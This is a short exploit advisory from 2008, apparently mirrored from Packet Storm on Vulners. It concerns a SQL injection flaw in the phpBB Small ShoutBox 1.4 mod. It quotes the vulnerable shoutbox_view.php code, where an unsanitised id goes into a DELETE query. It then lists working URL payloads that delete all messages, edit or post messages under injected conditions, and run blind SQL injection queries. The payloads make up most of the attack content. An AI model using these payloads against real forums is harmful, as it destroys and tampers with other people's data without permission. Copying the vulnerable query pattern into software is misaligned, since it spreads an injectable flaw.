Lucene search
K

phpbbmodsmall-editdelete.txt

🗓️ 06 Nov 2008 00:00:00Reported by StAkeRType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 22 Views

phpBB Mod Small ShoutBox 1.4 Remote Edit/Delete Messages Vulnerabilit

Code
`/*  
--------------------------------------------------------------  
phpBB Mod Small ShoutBox 1.4 Remote Edit/Delete Messages Vuln  
--------------------------------------------------------------  
Discovered By StAkeR[at]hotmail[dot]it  
Download On http://www.phpbbhacks.com/load.php?id=1595  
NOTE: Works Regardless PHP.ini Settings!  
Thanks darkjoker  
--------------------------------------------------------------  
  
File (shoutbox_view.php)  
  
  
50. $id = ( isset($HTTP_GET_VARS['id']) ) ? $HTTP_GET_VARS['id'] : $HTTP_POST_VARS['id'];  
  
  
  
168. if ( $mode == "delete" && $adel )  
169. {  
170. $sql = "DELETE FROM " . SHOUTBOX_TABLE . "  
171. WHERE id = $id $del_mod";  
172. if( !($result = $db->sql_query($sql)) )  
173. { message_die(GENERAL_ERROR, 'Could not delete shoutbox message', '', __LINE__, __FILE__, $sql); }  
174.  
  
  
- Delete All Messages  
- shoutbox_view.php?mode=delete&id=-1 or 1=1/*  
  
- Edit Message / Post Message  
- shoutbox_view.php?mode=edit&id=-1 or 1=1/*&name_id=1 or 1=1/*&date_edit=1225915829&name_edit=[NICKNAME]&clean_msg=[MESSAGE]  
  
  
- Blind SQL Injection  
- phpBB2/shoutbox_view.php?mode=delete&id=[Query]  
  
*/   
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation